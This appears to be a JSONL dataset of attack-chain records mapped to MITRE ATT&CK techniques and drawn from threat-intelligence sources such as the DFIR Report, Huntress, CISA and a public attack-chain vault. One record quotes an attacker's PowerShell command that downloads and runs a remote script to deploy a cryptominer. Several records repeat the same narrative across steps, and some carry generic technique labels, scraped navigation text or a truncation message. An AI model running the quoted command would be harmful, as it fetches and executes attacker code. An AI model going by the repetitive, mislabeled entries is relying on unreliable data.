"lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 3, "label": "Technique T1059.005", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1059.005"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 4, "label": "Technique T1071.001", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1071.001"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 5, "label": "Technique T1074.001", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1074.001"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 6, "label": "Technique T1082", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1082"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 7, "label": "Technique T1132.001", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1132.001"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 8, "label": "Technique T1140", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1140"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 9, "label": "Technique T1217", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1217"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 10, "label": "Technique T1518", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1518"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 11, "label": "Technique T1555.003", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1555.003"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 12, "label": "Technique T1555.004", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1555.004"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 13, "label": "Technique T1584.004", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1584.004"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 14, "label": "Technique T1587.001", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1587.001"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}], "provenance": {"url": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json", "retrieved_at": "2026-07-10T11:08:42.517678+00:00", "license": "", "lang": "en"}} {"chain_id": "a13ee6e28ec1643566f9a62f478953b0", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/raw_githubusercontent_com/sophoslabs_IoCs_master_2404_20impersonation_20campaign_csv/link.md", "title": "sophoslabs_IoCs_master_2404_20impersonation_20campaign_csv", "description": "sophoslabs_IoCs_master_2404_20impersonation_20campaign_csv", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://raw.githubusercontent.com/sophoslabs/IoCs/master/2404%20impersonation%20campaign.csv)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://raw.githubusercontent.com/sophoslabs/IoCs/master/2404%20impersonation%20campaign.csv)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://raw.githubusercontent.com/sophoslabs/IoCs/master/2404%20impersonation%20campaign.csv)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/raw_githubusercontent_com/sophoslabs_IoCs_master_2404_20impersonation_20campaign_csv/link.md", "retrieved_at": "2026-07-10T14:10:20.131143+00:00", "license": "", "lang": "en"}} {"chain_id": "76415729bb09d91da6b44835348521a2", "source_id": "huntress_blog", "external_id": "https://www.huntress.com/blog/ldap-active-directory-detection-part-5b", "title": "From Code to Coverage (Part 5B): Event 5156 Correlation: Proving Source IP Attribution Is Possible", "description": "From Code to Coverage (Part 5B): Event 5156 Correlation: Proving Source IP Attribution Is Possible", "steps": [{"order": 1, "label": "Phase 1: Understanding the event flow", "narrative": "In Part 5A we showed how ADWS hides the attacker’s IP from network sensors and Event 1644—the network sees only an encrypted blob on port 9389, and the LDAP log shows [::1] as the client. Here’s the full event sequence that makes attribution possible anyway. Event 5156 is the missing piece. It comes from the Windows Filtering Platform (WFP) and hits the Security event log every time a network connection is permitted. It’s become one of my favorite events for correlation work because it records the application that owns the connection, not just the port. So instead of seeing generic svchost.exe , you see microsoft.activedirectory.webservices.exe. It’s on by default under the Filtering Platform Connection audit subcategory, so no extra configuration is needed. When a remote host connects to ADWS on port 9389, Event 5156 captures the inbound connection with the real source IP. That happens before ADWS translates the request into an internal LDAP call, which is the step that swaps the real IP for localhost. Figure 1: Event 5156 (Security Log): The Windows Filtering Platform captures the inbound ADWS connection with the real source IP before the request is translated internally. Figure ", "mitre_attack": []}, {"order": 2, "label": "Phase 2: Port-based correlation", "narrative": "Event 1644 shows the client as [::1]:60983 (localhost with ephemeral port). If we could find an internal Event 5156 showing ADWS connecting to LDAP on that same port, we could chain: External 5156 → Internal 5156 (matching port) → 1644. Running SOAPy from the Linux box (10.1.1.13) and checking the logs: Event 1644: Client: [::1]:60983 User: MARVEL\\loki Filter: ( & (objectClass=user) ... ) Internal 5156 events found: 03:54:46.406 | ::1:61532 03:53:46.393 | ::1:61522 03:52:46.380 | ::1:61514 The ports don’t match. Event 1644 shows port 60983, but the internal 5156 events show 61532, 61522, and so on. Port 60983 is a persistent LDAP connection ADWS established long before the test. The original 5156 for that connection had already rolled out of the Security log. New queries reuse this existing connection — no new 5156 is created for each query. Port-based correlation only works in a SIEM where the original 5156 (when the persistent connection was first established) is still retained. On a live DC query, it may have rolled out.", "mitre_attack": []}, {"order": 3, "label": "Phase 3: Timestamp-based correlation", "narrative": "Port-based correlation failed, but the events still happen in sequence with predictable timing. Even if the persistent connection’s original 5156 has rolled out of the log, the external 5156 that fired for the current query is still there — timestamped within milliseconds of Event 1644. The hypothesis: correlate by time window. External 5156 → [ADWS processing] → Event 1644 ~60–80ms Same SOAPy attack, checking timestamps: External 5156: Time: 03:53:28.407 Source IP: 10.1.1.13 Dest Port: 9389 Application: microsoft.activedirectory.webservices.exe Event 1644: Time: 03:53:28.469 Client: [::1]:60983 User: MARVEL\\loki Filter: ( & (objectClass=user) (objectCategory=CN=Person,CN=Schema,CN=Configuration,DC=marvel,DC=local) ) Attributes: [all_with_list]nTSecurityDescriptor Controls: SDflags:0x7; Delta: 62ms Repeated testing across three runs: Test Run External 5156 Event 1644 Delta Run 1 03:52:22.256 03:52:22.339 83.2ms Run 2 03:53:28.407 03:53:28.469 61.2ms Run 3 03:55:25.275 03:55:25.341 65.8ms Consistent ~60-80ms window across all three runs. The processing delay between external connection and LDAP query execution is stable enough to correlate events.", "mitre_attack": []}, {"order": 4, "label": "Phase 4: Building the detection script", "narrative": "With timestamp correlation confirmed as reliable, the next step was building a script that could do this automatically — collecting the relevant events, attempting port-based correlation first, then falling back to the timing window. Running Get-ADWSAttribution.ps1 during active SOAPy enumeration: Figure 4: Get-ADWSAttribution.ps1 correlating Event 5156 → 1644 to attribute LDAP queries back to their source IP, catching MARVEL\\loki mid-BloodHound enumeration. Source IP 10.1.1.13 correctly attributed to all three queries. The real-time monitor mode catches it as it happens: Figure 5: Three events. One attacker. Event 5156 tells you who connected. Event 1138 tells you ADWS proxied it. Event 1644 tells you what they were after. ", "mitre_attack": []}, {"order": 5, "label": "Phase 5: The 5156 reality check", "narrative": "The first objection to any 5156-based detection is volume, the concern that it’s tuned down or disabled in most environments. Let's check: auditpol /get /subcategory: \"Filtering Platform Connection\" Filtering Platform Connection Success Event 5156 is on by default. It’s part of Windows Filtering Platform auditing that ships enabled out of the box. The volume concern is real, but it’s about retention, not availability. Every network connection generates a 5156, so on a busy DC, the Security log fills fast, and old events get overwritten. The fix is SIEM. Most enterprise environments already forward Security logs to a SIEM, which means the data is retained for days or weeks. Environment 5156 Availability Correlation Method Live DC query May have rolled out TIMESTAMP (probabilistic) SIEM (Splunk/Sentinel) Retained for days/weeks PORT (deterministic) or TIMESTAMP Forensic EVTX backup If captured in time Either method", "mitre_attack": []}, {"order": 6, "label": "Phase 6: Addressing the false positive problem", "narrative": "", "mitre_attack": []}], "provenance": {"url": "https://www.huntress.com/blog/ldap-active-directory-detection-part-5b", "retrieved_at": "2026-07-09T14:04:15.666062+00:00", "license": "", "lang": "en"}} {"chain_id": "2521b72276ce9a950dd66f2de08e1d38", "source_id": "crowdstrike_adversary", "external_id": "G0067", "title": "APT37", "description": "[APT37](https://attack.mitre.org/groups/G0067) is a Nor … [Строка слишком длинная. Вы можете скачать файл] {"chain_id": "7023615a3d2f075bfb15f9be4c30fb33", "source_id": "redstack_vault_chains", "external_id": "3f52d7ca-0a24-418f-99ea-cfe8cd721a0c", "title": "3f52d7ca-0a24-418f-99ea-cfe8cd721a0c", "description": "A multi-stage attack exploiting a reflected XSS vulnerability in Avito.ru's login redirect functionality by injecting a javascript: URI into the 'next' parameter, leading to arbitrary JavaScript execution post-authentication.", "steps": [{"order": 1, "label": "Craft-Malicious-Login-URL-with-XSS-Payload", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Avito.ru's login redirect functionality by injecting a javascript: URI into the 'next' parameter, leading to arbitrary JavaScript execution post-authentication.", "mitre_attack": [{"technique_id": "T1204.002"}]}, {"order": 2, "label": "Initiate-Social-Login-on-Avito", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Avito.ru's login redirect functionality by injecting a javascript: URI into the 'next' parameter, leading to arbitrary JavaScript execution post-authentication.", "mitre_attack": []}, {"order": 3, "label": "Trigger-and-Verify-XSS-Payload-Execution", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Avito.ru's login redirect functionality by injecting a javascript: URI into the 'next' parameter, leading to arbitrary JavaScript execution post-authentication.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Reflected-XSS-in-Avito-Login-Redirect-via-Unsanitized-'next'-Parameter.md", "retrieved_at": "2026-07-10T14:16:54.481693+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "2c19e6f476ab262710e776c32424e1a3", "source_id": "dfir_report_narratives", "external_id": "https://thedfirreport.com/2020/11/12/cryptominers-exploiting-weblogic-rce-cve-2020-14882", "title": "Cryptominers Exploiting WebLogic RCE CVE-2020-14882", "description": "Cryptominers Exploiting WebLogic RCE CVE-2020-14882", "steps": [{"order": 1, "label": "Initial Access", "narrative": "The threat actor executed an xml file named wbw hosted at 95.142.39[.]135 by exploiting CVE-2020-14882 . ", "mitre_attack": [{"technique_id": "T1078"}, {"technique_id": "T1190"}]}, {"order": 2, "label": "Execution", "narrative": "In the above screenshot, the threat actor executes wbw.xml which then downloads and executes 1.ps1. powershell.exe \"Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('http://95.142.39.135/1.ps1'))\" The script starts off by setting parameters, such as the download locations for XMRig and its config.", "mitre_attack": [{"technique_id": "T1059.001"}, {"technique_id": "T1078"}]}, {"order": 3, "label": "Impact", "narrative": "The server’s CPU was maxed out at 100% and likely would have caused issues in an enterprise environment. At the time of this writing the wallet used for mining barely had anything in it and appears to be dedicated to us. Enjoy our report? Please consider donating $1 or more to the project using Patreon . Thank you for your support! We also have pcaps (exploit pcap), files, memory images, and Kape packages available here .", "mitre_attack": []}], "provenance": {"url": "https://thedfirreport.com/2020/11/12/cryptominers-exploiting-weblogic-rce-cve-2020-14882", "retrieved_at": "2026-07-13T12:19:13.365093+00:00", "license": "", "lang": "en"}} {"chain_id": "05e3fc6a3e08906ff456f7dff32eb841", "source_id": "redstack_vault_chains", "external_id": "ad2d5a39-2c2d-4405-8d10-b6953138e52f", "title": "ad2d5a39-2c2d-4405-8d10-b6953138e52f", "description": "Demonstrates a vulnerability in the Slack Windows desktop app where session credentials persist after uninstallation, allowing automatic re-authentication on reinstallation and enabling unauthorized access on shared devices.", "steps": [{"order": 1, "label": "Install-Slack-Desktop-App-on-Windows", "narrative": "Demonstrates a vulnerability in the Slack Windows desktop app where session credentials persist after uninstallation, allowing automatic re-authentication on reinstallation and enabling unauthorized access on shared devices.", "mitre_attack": []}, {"order": 2, "label": "Authenticate-to-Slack-on-Windows", "narrative": "Demonstrates a vulnerability in the Slack Windows desktop app where session credentials persist after uninstallation, allowing automatic re-authentication on reinstallation and enabling unauthorized access on shared devices.", "mitre_attack": []}, {"order": 3, "label": "Uninstall-Slack-Desktop-App-on-Windows", "narrative": "Demonstrates a vulnerability in the Slack Windows desktop app where session credentials persist after uninstallation, allowing automatic re-authentication on reinstallation and enabling unauthorized access on shared devices.", "mitre_attack": []}, {"order": 4, "label": "Reinstall-Slack-and-Verify-Session-Persistence", "narrative": "Demonstrates a vulnerability in the Slack Windows desktop app where session credentials persist after uninstallation, allowing automatic re-authentication on reinstallation and enabling unauthorized access on shared devices.", "mitre_attack": [{"technique_id": "T1547"}]}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Exploit-Slack-Desktop-Session-Persistence-After-Uninstallation-on-Windows-for-Unauthorized-Access.md", "retrieved_at": "2026-07-10T14:13:57.946611+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "7e473a10d9a429ff501c6a69ddc28b6a", "source_id": "redstack_vault_chains", "external_id": "0befdb96-0509-4844-a16a-137b69bcb502", "title": "0befdb96-0509-4844-a16a-137b69bcb502", "description": "Attack chain exploiting the absence of brute force protection in Nextcloud's TOTP-based 2FA, allowing unlimited guesses of 6-digit codes after valid primary credentials.", "steps": [{"order": 1, "label": "Brute-Force-Nextcloud-TOTP-2FA", "narrative": "Attack chain exploiting the absence of brute force protection in Nextcloud's TOTP-based 2FA, allowing unlimited guesses of 6-digit codes after valid primary credentials.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Brute-Force-Attack-on-Nextcloud-TOTP-2FA-Without-Rate-Limiting.md", "retrieved_at": "2026-07-10T14:11:52.601880+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "d9ebd62c5490453d7a66a0d9d0c64e1b", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/blog_trendmicro_com/trendlabs-security-intelligence_water-nue-campaign-targets-c-suites-office-365-accounts/link.md", "title": "trendlabs-security-intelligence_water-nue-campaign-targets-c-suites-office-365-accounts", "description": "trendlabs-security-intelligence_water-nue-campaign-targets-c-suites-office-365-accounts", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://blog.trendmicro.com/trendlabs-security-intelligence/water-nue-campaign-targets-c-suites-office-365-accounts/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://blog.trendmicro.com/trendlabs-security-intelligence/water-nue-campaign-targets-c-suites-office-365-accounts/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://blog.trendmicro.com/trendlabs-security-intelligence/water-nue-campaign-targets-c-suites-office-365-accounts/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/blog_trendmicro_com/trendlabs-security-intelligence_water-nue-campaign-targets-c-suites-office-365-accounts/link.md", "retrieved_at": "2026-07-10T13:10:44.018985+00:00", "license": "", "lang": "en"}} {"chain_id": "e9dcf3eb3974e4492373abd9fd5e5ca1", "source_id": "cert_pl_alerts", "external_id": "https://cert.pl/en/posts/2026/05/CVE-2025-68420/", "title": "Social media", "description": "Social media", "steps": [{"order": 1, "label": "Technique T1078", "narrative": "CERT Polska has received a report about 2 vulnerabilities (CVE-2025-68420 and CVE-2025-68421) found in Comarch ERP Optima software.\nReport an incident\nBack\nYou're in the menu\nAbout us\nAbout us\nAbout our team\nContact\nFor experts\nFor experts\nNews\nPublications\nThe Warning List\nTools\nn6\nArtemis\nMWDB\nCVD program\nCVD policy\nAdvisories\nAbout us\nFor experts\nReport an incident\nAbout us\nAbout our team\nContact\nBaza wiedzy\nFałszywe inwestycje\nUważaj na fałszywe sklepy online\n(Nie)bezpieczne płatności\nFałszywi konsultanci\nZadbaj o bezpieczne hasła i logowanie\nFałszywe załączniki w mailach\nFałszywe prośby o szybki przelew\nFałszywe SMSy - plaga ostatnich miesięcy\nBezpieczny telefon\nBiuletyn OUCH!\nPorady bezpieczeństwa OUCH!\nFor experts\nPublications\nThe Warning List\nTools\nn6\nArtemis\nMWDB\nCVD program\nCVD p", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 2, "label": "Technique T1190", "narrative": "CERT Polska has received a report about 2 vulnerabilities (CVE-2025-68420 and CVE-2025-68421) found in Comarch ERP Optima software.\nReport an incident\nBack\nYou're in the menu\nAbout us\nAbout us\nAbout our team\nContact\nFor experts\nFor experts\nNews\nPublications\nThe Warning List\nTools\nn6\nArtemis\nMWDB\nCVD program\nCVD policy\nAdvisories\nAbout us\nFor experts\nReport an incident\nAbout us\nAbout our team\nContact\nBaza wiedzy\nFałszywe inwestycje\nUważaj na fałszywe sklepy online\n(Nie)bezpieczne płatności\nFałszywi konsultanci\nZadbaj o bezpieczne hasła i logowanie\nFałszywe załączniki w mailach\nFałszywe prośby o szybki przelew\nFałszywe SMSy - plaga ostatnich miesięcy\nBezpieczny telefon\nBiuletyn OUCH!\nPorady bezpieczeństwa OUCH!\nFor experts\nPublications\nThe Warning List\nTools\nn6\nArtemis\nMWDB\nCVD program\nCVD p", "mitre_attack": [{"technique_id": "T1190"}]}], "provenance": {"url": "https://cert.pl/en/posts/2026/05/CVE-2025-68420/", "retrieved_at": "2026-07-09T20:03:12.139161+00:00", "license": "", "lang": "en"}} {"chain_id": "4fe57079f5b67905f4889313aee101ab", "source_id": "splunk_attack_data_scenarios", "external_id": "datasets/attack_techniques/T1098/esxi_admin_role/esxi_admin_role.yml", "title": "esxi_admin_role", "description": "esxi_admin_role", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "author: Raven Tait, Splunk\nid: 6957528c-1167-469f-a982-d03dea0ff09e\ndate: '2025-07-09'\ndescription: 'Sample of ESXi syslog events showing account manipulation of esxi account to give it the admin role.'\nenvironment: custom\ndirectory: esxi_admin_role\nmitre_technique:\n- T1098\ndatasets:\n- name: vmw-syslog\n path: /datasets/attack_techniques/T1098/esxi_admin_role/esxi_admin_role.log\n sourcetype: vmw-syslog\n source: vmw-syslog", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "author: Raven Tait, Splunk\nid: 6957528c-1167-469f-a982-d03dea0ff09e\ndate: '2025-07-09'\ndescription: 'Sample of ESXi syslog events showing account manipulation of esxi account to give it the admin role.'\nenvironment: custom\ndirectory: esxi_admin_role\nmitre_technique:\n- T1098\ndatasets:\n- name: vmw-syslog\n path: /datasets/attack_techniques/T1098/esxi_admin_role/esxi_admin_role.log\n sourcetype: vmw-syslog\n source: vmw-syslog", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "author: Raven Tait, Splunk\nid: 6957528c-1167-469f-a982-d03dea0ff09e\ndate: '2025-07-09'\ndescription: 'Sample of ESXi syslog events showing account manipulation of esxi account to give it the admin role.'\nenvironment: custom\ndirectory: esxi_admin_role\nmitre_technique:\n- T1098\ndatasets:\n- name: vmw-syslog\n path: /datasets/attack_techniques/T1098/esxi_admin_role/esxi_admin_role.log\n sourcetype: vmw-syslog\n source: vmw-syslog", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/splunk/attack_data/tree/master/datasets/attack_techniques/T1098/esxi_admin_role/esxi_admin_role.yml", "retrieved_at": "2026-07-10T11:45:53.727692+00:00", "license": "Apache-2.0", "lang": "en"}} {"chain_id": "26bd13e48322b18b25a2e05b3611375f", "source_id": "misp_galaxy_relations", "external_id": "96150c35-466f-4f0a-97a9-ae87ee27f751", "title": "Bootkit Mitigation - T1067", "description": "Bootkit Mitigation - T1067", "steps": [{"order": 1, "label": "Technique T1067", "narrative": "T1067 ['http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf', 'https://attack.mitre.org/mitigations/T1067', 'https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process']", "mitre_attack": [{"technique_id": "T1067"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/mitre-course-of-action.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-course-of-action.json", "retrieved_at": "2026-07-10T11:21:40.650182+00:00", "license": "", "lang": "en"}, "actor": {"name": "Bootkit Mitigation - T1067", "aliases": []}} {"chain_id": "b4c9631ef0e2da893b039970fd132825", "source_id": "redstack_vault_chains", "external_id": "b5cf6ca2-c464-4aa9-8cde-e5bb66176e9b", "title": "b5cf6ca2-c464-4aa9-8cde-e5bb66176e9b", "description": "A multi-stage attack exploiting a reflected XSS vulnerability in Semrush's redirect endpoint by bypassing URL validation with double-encoded newlines, leading to JavaScript execution, cookie theft, and open redirects for phishing.", "steps": [{"order": 1, "label": "Reference-Previous-Redirect-Fix", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Semrush's redirect endpoint by bypassing URL validation with double-encoded newlines, leading to JavaScript execution, cookie theft, and open redirects for phishing.", "mitre_attack": []}, {"order": 2, "label": "Test-Initial-XSS-Payload", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Semrush's redirect endpoint by bypassing URL validation with double-encoded newlines, leading to JavaScript execution, cookie theft, and open redirects for phishing.", "mitre_attack": []}, {"order": 3, "label": "Double-Encode-Newline-for-XSS-Bypass", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Semrush's redirect endpoint by bypassing URL validation with double-encoded newlines, leading to JavaScript execution, cookie theft, and open redirects for phishing.", "mitre_attack": []}, {"order": 4, "label": "Execute-Chained-XSS-Redirects", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Semrush's redirect endpoint by bypassing URL validation with double-encoded newlines, leading to JavaScript execution, cookie theft, and open redirects for phishing.", "mitre_attack": []}, {"order": 5, "label": "Inject-Stealthy-XSS-Payload", "narrative": "A multi-stage attack exploiting a reflected XSS vulnerability in Semrush's redirect endpoint by bypassing URL validation with double-encoded newlines, leading to JavaScript execution, cookie theft, and open redirects for phishing.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Reflected-XSS-Bypass-via-Double-Encoded-Newline-in-Semrush-Redirect-Endpoint.md", "retrieved_at": "2026-07-10T14:16:43.262495+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "f2a1748cb5345ffb7502c5cca3fcb322", "source_id": "cisa_aa_catalog", "external_id": "ICSA-23-206-01", "title": "AXIS A1001", "description": "AXIS A1001", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "AXIS A1001: AXIS A1001\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "AXIS A1001: AXIS A1001\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "AXIS A1001: AXIS A1001\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "AXIS A1001: AXIS A1001\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "AXIS A1001: AXIS A1001\nThis CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-206-01", "retrieved_at": "2026-07-09T14:00:15.816596+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "8681d46d497697bf716e0f1af6edc27d", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/cybersecuritynews_com/dolby-codec-android-vulnerability/link.md", "title": "dolby-codec-android-vulnerability", "description": "dolby-codec-android-vulnerability", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://cybersecuritynews.com/dolby-codec-android-vulnerability/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://cybersecuritynews.com/dolby-codec-android-vulnerability/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://cybersecuritynews.com/dolby-codec-android-vulnerability/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": 